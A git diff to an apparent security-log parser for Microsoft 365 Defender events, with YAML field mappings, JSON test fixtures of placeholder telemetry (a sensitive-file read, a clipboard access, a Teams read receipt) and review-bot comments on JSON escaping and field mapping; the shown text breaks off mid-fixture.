action.properties.ProcessVersionInfoFileDescription: "{{json_event.message.properties.ProcessVersionInfoFileDescription}}" + action.properties.ProcessVersionInfoInternalFileName: "{{json_event.message.properties.ProcessVersionInfoInternalFileName}}" + action.properties.ProcessVersionInfoOriginalFileName: "{{json_event.message.properties.ProcessVersionInfoOriginalFileName}}" + action.properties.ProcessVersionInfoProductName: "{{json_event.message.properties.ProcessVersionInfoProductName}}" + action.properties.ProcessVersionInfoProductVersion: "{{json_event.message.properties.ProcessVersionInfoProductVersion}}" + action.properties.InitiatingProcessAccountObjectId: "{{json_event.message.properties.InitiatingProcessAccountObjectId}}" + action.properties.InitiatingProcessFileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}" + action.properties.InitiatingProcessIntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}" + action.properties.InitiatingProcessLogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}" + action.properties.InitiatingProcessTokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation}}" + action.properties.InitiatingProcessCommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}" + action.properties.InitiatingProcessVersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}" + action.properties.InitiatingProcessVersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}" + action.properties.InitiatingProcessVersionInfoInternalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoInternalFileName}}" + action.properties.InitiatingProcessVersionInfoOriginalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoOriginalFileName}}" + action.properties.InitiatingProcessVersionInfoProductName: 
"{{json_event.message.properties.InitiatingProcessVersionInfoProductName}}" + action.properties.InitiatingProcessVersionInfoProductVersion: "{{json_event.message.properties.InitiatingProcessVersionInfoProductVersion}}" + + - set: + process.parent.args: '{{json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:]}}' + filter: '{{json_event.message.properties.get("InitiatingProcessCommandLine") and json_event.message.properties.InitiatingProcessCommandLine.split(" ") | length > 1 and json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:] != [""]}}' + + - set: + process.args: '{{json_event.message.properties.ProcessCommandLine.split(" ")[1:]}}' + filter: '{{json_event.message.properties.get("ProcessCommandLine") and json_event.message.properties.ProcessCommandLine.split(" ") | length > 1 and json_event.message.properties.ProcessCommandLine.split(" ")[1:] != [""]}}' + set_alert_evidence_fields: actions: - set: @@ -341,7 +419,6 @@ stages: event.dataset: "device_events" event.category: ["host"] action.properties.RemoteDeviceName: "{{json_event.message.properties.RemoteDeviceName}}" - action.properties.ProcessTokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}" set_device_file_certificate_info_fields: actions: - set: 
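Review bot: The new `microsoft.defender.operation.properties` setter in the `-250,15 +226,117` hunk builds JSON by raw interpolation — `"{{property.Name}}":"{{property.Value}}",` — so a property name or value containing `"` or `\` produces malformed JSON or alters the structure of the emitted object, and the loop emits a trailing comma after the last pair, which strict JSON parsing rejects. Serialising each name and value through a JSON-escaping filter and dropping the comma on the last iteration (e.g. `{{ "," if not loop.last }}` if the engine is Jinja) would make the output well-formed regardless of log content; note too that the rest of this hunk writes null as `None` (`get("RequestProtocol") != None`) while this block uses `property.Value != null`, and in Jinja `null` is an undefined name rather than the null literal, so that guard may never exclude anything. Separately, in `set_process_events` `process.pid` and `process.command_line` prefer `ProcessId`/`ProcessCommandLine` while `process.start`, `process.name`, `process.executable` and `process.hash.*` come from the `InitiatingProcess*` fields, so when both are present the single `process` object mixes two different processes; and `set_process_deviceprocess_events` derives `process.working_directory` from `FolderPath` but never sets `process.executable`, which presumably should also come from `FolderPath` — worth confirming against the DeviceProcessEvents schema.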
@@ -454,15 +531,6 @@ stages: - set: event.dataset: "device_process_events" event.category: ["process"] - process.code_signature.status: "{{json_event.message.properties.InitiatingProcessSignatureStatus}}" - process.code_signature.subject_name: "{{json_event.message.properties.InitiatingProcessSignerType}}" - action.properties.ProcessIntegrityLevel: "{{json_event.message.properties.ProcessIntegrityLevel}}" - action.properties.ProcessVersionInfoCompanyName: "{{json_event.message.properties.ProcessVersionInfoCompanyName}}" - action.properties.ProcessVersionInfoFileDescription: "{{json_event.message.properties.ProcessVersionInfoFileDescription}}" - action.properties.ProcessVersionInfoInternalFileName: "{{json_event.message.properties.ProcessVersionInfoInternalFileName}}" - action.properties.ProcessVersionInfoOriginalFileName: "{{json_event.message.properties.ProcessVersionInfoOriginalFileName}}" - action.properties.ProcessVersionInfoProductName: "{{json_event.message.properties.ProcessVersionInfoProductName}}" - action.properties.ProcessVersionInfoProductVersion: "{{json_event.message.properties.ProcessVersionInfoProductVersion}}" set_device_registry_events_fields: actions: - set: diff --git a/Microsoft/microsoft-365-defender/tests/test_cloud_app3.json b/Microsoft/microsoft-365-defender/tests/test_cloud_app3.json index d60cc39a1..764942b33 100644 --- a/Microsoft/microsoft-365-defender/tests/test_cloud_app3.json +++ b/Microsoft/microsoft-365-defender/tests/test_cloud_app3.json @@ -84,6 +84,12 @@ ], "type": "Run" }, + "operation": { + "properties": { + "IsThrottled": "False", + "MailAccessType": "Bind" + } + }, "report": { "id": "98261974_20893_f747c19c-0664-45c8-aac9-8f16e7714de1" } diff --git a/Microsoft/microsoft-365-defender/tests/test_cloud_app4.json b/Microsoft/microsoft-365-defender/tests/test_cloud_app4.json new file mode 100644 index 000000000..86f044fe7 --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_cloud_app4.json 
@@ -0,0 +1,63 @@ +{ + "input": { + "message": "{\"time\":\"2024-10-28T14:24:31.9854915Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-CloudAppEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:20:30.0960000Z\",\"properties\":{\"ActionType\":\"MessageReadReceiptReceived\",\"ApplicationId\":28375,\"AccountDisplayName\":\"John DOE\",\"AccountObjectId\":\"abcd1234-1234-1234-1234-abcdef123456\",\"AccountId\":\"abcd1234-1234-1234-1234-abcdef123456\",\"DeviceType\":null,\"OSPlatform\":null,\"IPAddress\":null,\"IsAnonymousProxy\":null,\"CountryCode\":null,\"City\":null,\"ISP\":null,\"UserAgent\":null,\"IsAdminOperation\":false,\"ActivityObjects\":[{\"Type\":\"Structured object\",\"Role\":\"Parameter\",\"ServiceObjectType\":\"Microsoft Team\"},{\"Type\":\"User\",\"Role\":\"Actor\",\"Name\":\"John DOE\",\"Id\":\"abcd1234-1234-1234-1234-abcdef123456\",\"ApplicationId\":11161,\"ApplicationInstance\":0}],\"AdditionalFields\":{},\"ActivityType\":\"Basic\",\"ObjectName\":null,\"ObjectType\":null,\"ObjectId\":null,\"AppInstanceId\":0,\"AccountType\":\"Regular\",\"IsExternalUser\":false,\"IsImpersonated\":false,\"IPTags\":null,\"IPCategory\":null,\"UserAgentTags\":null,\"RawEventData\":{\"ChatThreadId\":\"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\",\"CommunicationType\":\"GroupChat\",\"CreationTime\":\"2024-10-28T14:18:38Z\",\"ExtraProperties\":[],\"Id\":\"abcd1234-ef09-1234-abcd-123456abcdef\",\"ItemName\":\"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\",\"MessageId\":\"1730125116564\",\"MessageVersion\":\"0\",\"MessageVisibilityTime\":\"2022-09-21T08:33:35Z\",\"Operation\":\"MessageReadReceiptReceived\",\"OrganizationId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"ParticipantInfo\":{\"HasForeignTenantUsers\":false,\"HasGuestUsers\":false,\"HasOtherGuestUsers\":false,\"HasUnauthenticatedUsers\":false,\"ParticipatingDomains\":
[],\"ParticipatingSIPDomains\":[],\"ParticipatingTenantIds\":[\"12345678-abcd-ef09-1234-123456abcdef\"]},\"RecordType\":25,\"ResourceTenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"UserId\":\"john.doe@company.fr\",\"UserKey\":\"abcd1234-1234-1234-1234-abcdef123456\",\"UserType\":0,\"Version\":1,\"Workload\":\"MicrosoftTeams\"},\"ReportId\":\"98261974_28375_abcd1234-ef09-1234-abcd-123456abcdef\",\"Timestamp\":\"2024-10-28T14:18:38Z\",\"Application\":\"Microsoft Teams\"},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-10-28T14:24:31.9854915Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-CloudAppEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:20:30.0960000Z\",\"properties\":{\"ActionType\":\"MessageReadReceiptReceived\",\"ApplicationId\":28375,\"AccountDisplayName\":\"John DOE\",\"AccountObjectId\":\"abcd1234-1234-1234-1234-abcdef123456\",\"AccountId\":\"abcd1234-1234-1234-1234-abcdef123456\",\"DeviceType\":null,\"OSPlatform\":null,\"IPAddress\":null,\"IsAnonymousProxy\":null,\"CountryCode\":null,\"City\":null,\"ISP\":null,\"UserAgent\":null,\"IsAdminOperation\":false,\"ActivityObjects\":[{\"Type\":\"Structured object\",\"Role\":\"Parameter\",\"ServiceObjectType\":\"Microsoft Team\"},{\"Type\":\"User\",\"Role\":\"Actor\",\"Name\":\"John 
DOE\",\"Id\":\"abcd1234-1234-1234-1234-abcdef123456\",\"ApplicationId\":11161,\"ApplicationInstance\":0}],\"AdditionalFields\":{},\"ActivityType\":\"Basic\",\"ObjectName\":null,\"ObjectType\":null,\"ObjectId\":null,\"AppInstanceId\":0,\"AccountType\":\"Regular\",\"IsExternalUser\":false,\"IsImpersonated\":false,\"IPTags\":null,\"IPCategory\":null,\"UserAgentTags\":null,\"RawEventData\":{\"ChatThreadId\":\"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\",\"CommunicationType\":\"GroupChat\",\"CreationTime\":\"2024-10-28T14:18:38Z\",\"ExtraProperties\":[],\"Id\":\"abcd1234-ef09-1234-abcd-123456abcdef\",\"ItemName\":\"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\",\"MessageId\":\"1730125116564\",\"MessageVersion\":\"0\",\"MessageVisibilityTime\":\"2022-09-21T08:33:35Z\",\"Operation\":\"MessageReadReceiptReceived\",\"OrganizationId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"ParticipantInfo\":{\"HasForeignTenantUsers\":false,\"HasGuestUsers\":false,\"HasOtherGuestUsers\":false,\"HasUnauthenticatedUsers\":false,\"ParticipatingDomains\":[],\"ParticipatingSIPDomains\":[],\"ParticipatingTenantIds\":[\"12345678-abcd-ef09-1234-123456abcdef\"]},\"RecordType\":25,\"ResourceTenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"UserId\":\"john.doe@company.fr\",\"UserKey\":\"abcd1234-1234-1234-1234-abcdef123456\",\"UserType\":0,\"Version\":1,\"Workload\":\"MicrosoftTeams\"},\"ReportId\":\"98261974_28375_abcd1234-ef09-1234-abcd-123456abcdef\",\"Timestamp\":\"2024-10-28T14:18:38Z\",\"Application\":\"Microsoft Teams\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "network" + ], + "dataset": "cloud_app_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-10-28T14:18:38Z", + "action": { + "properties": { + "Application": "Microsoft Teams", + "ApplicationId": "28375", + "IsAdminOperation": "false", + "IsExternalUser": false, + "IsImpersonated": false, + "RawEventData": 
"{\"ChatThreadId\": \"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\", \"CommunicationType\": \"GroupChat\", \"CreationTime\": \"2024-10-28T14:18:38Z\", \"ExtraProperties\": [], \"Id\": \"abcd1234-ef09-1234-abcd-123456abcdef\", \"ItemName\": \"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\", \"MessageId\": \"1730125116564\", \"MessageVersion\": \"0\", \"MessageVisibilityTime\": \"2022-09-21T08:33:35Z\", \"Operation\": \"MessageReadReceiptReceived\", \"OrganizationId\": \"12345678-abcd-ef09-1234-123456abcdef\", \"ParticipantInfo\": {\"HasForeignTenantUsers\": false, \"HasGuestUsers\": false, \"HasOtherGuestUsers\": false, \"HasUnauthenticatedUsers\": false, \"ParticipatingDomains\": [], \"ParticipatingSIPDomains\": [], \"ParticipatingTenantIds\": [\"12345678-abcd-ef09-1234-123456abcdef\"]}, \"RecordType\": 25, \"ResourceTenantId\": \"12345678-abcd-ef09-1234-123456abcdef\", \"UserId\": \"john.doe@company.fr\", \"UserKey\": \"abcd1234-1234-1234-1234-abcdef123456\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"MicrosoftTeams\"}" + }, + "type": "MessageReadReceiptReceived" + }, + "microsoft": { + "defender": { + "activity": { + "objects": [ + { + "Role": "Parameter", + "ServiceObjectType": "Microsoft Team", + "Type": "Structured object" + }, + { + "ApplicationId": 11161, + "ApplicationInstance": 0, + "Id": "abcd1234-1234-1234-1234-abcdef123456", + "Name": "John DOE", + "Role": "Actor", + "Type": "User" + } + ], + "type": "Basic" + }, + "report": { + "id": "98261974_28375_abcd1234-ef09-1234-abcd-123456abcdef" + } + } + }, + "user": { + "full_name": "John DOE" + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json b/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json new file mode 100644 index 000000000..2655cb069 --- /dev/null 
+++ b/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json 
@@ -0,0 +1,97 @@ +{ + "input": { + "message": "{\"time\":\"2024-11-12T10:18:48.4363168Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:18:28.1484017Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"user.company.local\",\"ReportId\":73291,\"InitiatingProcessId\":1328,\"InitiatingProcessCreationTime\":\"2024-11-12T10:17:23.9905327Z\",\"InitiatingProcessCommandLine\":\"\\\"Browser.exe\\\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0\",\"InitiatingProcessParentFileName\":\"Windows.exe\",\"InitiatingProcessParentId\":1820,\"InitiatingProcessParentCreationTime\":\"2024-10-14T05:47:54.3243814Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"browser.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files 
(x86)\\\\browser.exe\",\"InitiatingProcessAccountName\":\"username\",\"InitiatingProcessAccountDomain\":\"company\",\"SHA1\":null,\"MD5\":null,\"FileName\":\"FileName.mdb\",\"FolderPath\":\"C:\\\\Log\",\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":null,\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"SensitiveFileRead\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":5223047,\"AccountSid\":\"S-1-2-3\",\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"USERNAME@COMPANY.COM\",\"InitiatingProcessAccountObjectId\":\"12345678-abcd-1234-ef09-abcdef123456\",\"FileSize\":286720,\"InitiatingProcessFileSize\":3316224,\"InitiatingProcessVersionInfoCompanyName\":\"Test Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Test Product\",\"InitiatingProcessVersionInfoProductVersion\":\"1, 0, 0, 1\",\"InitiatingProcessVersionInfoInternalFileName\":\"Browser.EXE\",\"InitiatingProcessVersionInfoOriginalFileName\":\"Browser.EXE\",\"InitiatingProcessVersionInfoFileDescription\":\"Browser EXE\",\"InitiatingProcessSessionId\":1,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:17:24.8588296Z\",\"MachineGroup\":\"PC\"},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": 
"05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-11-12T10:18:48.4363168Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:18:28.1484017Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"user.company.local\",\"ReportId\":73291,\"InitiatingProcessId\":1328,\"InitiatingProcessCreationTime\":\"2024-11-12T10:17:23.9905327Z\",\"InitiatingProcessCommandLine\":\"\\\"Browser.exe\\\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0\",\"InitiatingProcessParentFileName\":\"Windows.exe\",\"InitiatingProcessParentId\":1820,\"InitiatingProcessParentCreationTime\":\"2024-10-14T05:47:54.3243814Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"browser.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files 
(x86)\\\\browser.exe\",\"InitiatingProcessAccountName\":\"username\",\"InitiatingProcessAccountDomain\":\"company\",\"SHA1\":null,\"MD5\":null,\"FileName\":\"FileName.mdb\",\"FolderPath\":\"C:\\\\Log\",\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":null,\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"SensitiveFileRead\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":5223047,\"AccountSid\":\"S-1-2-3\",\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"USERNAME@COMPANY.COM\",\"InitiatingProcessAccountObjectId\":\"12345678-abcd-1234-ef09-abcdef123456\",\"FileSize\":286720,\"InitiatingProcessFileSize\":3316224,\"InitiatingProcessVersionInfoCompanyName\":\"Test Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Test Product\",\"InitiatingProcessVersionInfoProductVersion\":\"1, 0, 0, 1\",\"InitiatingProcessVersionInfoInternalFileName\":\"Browser.EXE\",\"InitiatingProcessVersionInfoOriginalFileName\":\"Browser.EXE\",\"InitiatingProcessVersionInfoFileDescription\":\"Browser EXE\",\"InitiatingProcessSessionId\":1,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:17:24.8588296Z\",\"MachineGroup\":\"PC\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "host" + ], + "dataset": "device_events", + "type": [ + 
"info" + ] + }, + "@timestamp": "2024-11-12T10:17:24.858829Z", + "action": { + "properties": { + "AccountSid": "S-1-2-3", + "InitiatingProcessAccountObjectId": "12345678-abcd-1234-ef09-abcdef123456", + "InitiatingProcessCommandLine": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0", + "InitiatingProcessFileSize": 3316224, + "InitiatingProcessLogonId": "5223047", + "InitiatingProcessVersionInfoCompanyName": "Test Corporation", + "InitiatingProcessVersionInfoFileDescription": "Browser EXE", + "InitiatingProcessVersionInfoInternalFileName": "Browser.EXE", + "InitiatingProcessVersionInfoOriginalFileName": "Browser.EXE", + "InitiatingProcessVersionInfoProductName": "Test Product", + "InitiatingProcessVersionInfoProductVersion": "1, 0, 0, 1" + }, + "type": "SensitiveFileRead" + }, + "file": { + "directory": "C:\\Log", + "name": "FileName.mdb", + "size": 286720 + }, + "host": { + "id": "abcdef0123456789", + "name": "user.company.local" + }, + "microsoft": { + "defender": { + "report": { + "id": "73291" + } + } + }, + "process": { + "args": [ + "/DBMode", + "/Network", + "/ProjectID", + "/Ticket", + "0", + "0", + "12345678-1234-5678-9012-345678901234", + "123456789" + ], + "command_line": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0", + "executable": "c:\\program files (x86)\\browser.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "browser.exe", + "parent": { + "name": "Windows.exe", + "pid": 1820, + "start": "2024-10-14T05:47:54.324381Z" + }, + "pid": 1328, + "start": "2024-11-12T10:17:23.990532Z", + "user": { + "domain": "company", + "email": "USERNAME@COMPANY.COM", + "id": "S-1-2-3", + "name": "username" + }, + "working_directory": "c:\\program files (x86)" + }, + "related": { + "hash": [ + 
"44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + ] + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_deivce_events_2.json b/Microsoft/microsoft-365-defender/tests/test_device_events_2.json similarity index 100% rename from Microsoft/microsoft-365-defender/tests/test_deivce_events_2.json rename to Microsoft/microsoft-365-defender/tests/test_device_events_2.json diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json b/Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json new file mode 100644 index 000000000..3292ed6fe --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json 
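Review bot: This fixture expects the tokens of `InitiatingProcessCommandLine` under `process.args` and nothing under `process.parent.args`, whereas the `set` block visible at the top of this diff's parser hunk assigns `InitiatingProcessCommandLine.split(" ")[1:]` to `process.parent.args`. Presumably a device_events-specific stage outside this diff maps the initiating process to `process` instead, but as committed the fixture does not demonstrate the new `process.parent.args`/`process.args` blocks at all, since `ProcessCommandLine` is null here. A fixture with a non-null `ProcessCommandLine`, or one where the initiating process lands in `process.parent`, would actually pin the new behaviour. Note also that the plain whitespace split will cut a quoted argument containing spaces into several tokens, and none of the added fixtures appears to exercise that case.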
@@ -0,0 +1,81 @@ +{ + "input": { + "message": "{\"time\":\"2024-11-12T09:49:58.3460812Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T09:49:02.3098089Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"device.company.fr\",\"ReportId\":157950,\"InitiatingProcessId\":12824,\"InitiatingProcessCreationTime\":\"2024-11-12T10:09:31.1004556Z\",\"InitiatingProcessCommandLine\":\"\\\"OUTLOOK.EXE\\\" \",\"InitiatingProcessParentFileName\":\"exec.exe\",\"InitiatingProcessParentId\":18840,\"InitiatingProcessParentCreationTime\":\"2024-11-12T08:44:15.1503958Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"outlook.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files\\\\microsoft office\\\\root\\\\outlook.exe\",\"InitiatingProcessAccountName\":\"john.doe\",\"InitiatingProcessAccountDomain\":\"account-domain\",\"SHA1\":null,\"MD5\":null,\"FileName\":null,\"FolderPath\":null,\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":null,\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"GetClipboardData\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":389220681,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"john.doe@account-domain.fr\",\"InitiatingProcessAccountObjectId\":\"12345678-abcd-1234-efab-56789123abcd\",\"File
Size\":null,\"InitiatingProcessFileSize\":44152968,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft Outlook\",\"InitiatingProcessVersionInfoProductVersion\":\"16.0.17928.20216\",\"InitiatingProcessVersionInfoInternalFileName\":\"Outlook\",\"InitiatingProcessVersionInfoOriginalFileName\":\"Outlook.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Microsoft Outlook\",\"InitiatingProcessSessionId\":12,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:19:26.5027772Z\",\"MachineGroup\":\"All_Win10_11\"},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-11-12T09:49:58.3460812Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T09:49:02.3098089Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"device.company.fr\",\"ReportId\":157950,\"InitiatingProcessId\":12824,\"InitiatingProcessCreationTime\":\"2024-11-12T10:09:31.1004556Z\",\"InitiatingProcessCommandLine\":\"\\\"OUTLOOK.EXE\\\" \",\"InitiatingProcessParentFileName\":\"exec.exe\",\"InitiatingProcessParentId\":18840,\"InitiatingProcessParentCreationTime\":\"2024-11-12T08:44:15.1503958Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"outlook.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files\\\\microsoft 
office\\\\root\\\\outlook.exe\",\"InitiatingProcessAccountName\":\"john.doe\",\"InitiatingProcessAccountDomain\":\"account-domain\",\"SHA1\":null,\"MD5\":null,\"FileName\":null,\"FolderPath\":null,\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":null,\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"GetClipboardData\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":389220681,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"john.doe@account-domain.fr\",\"InitiatingProcessAccountObjectId\":\"12345678-a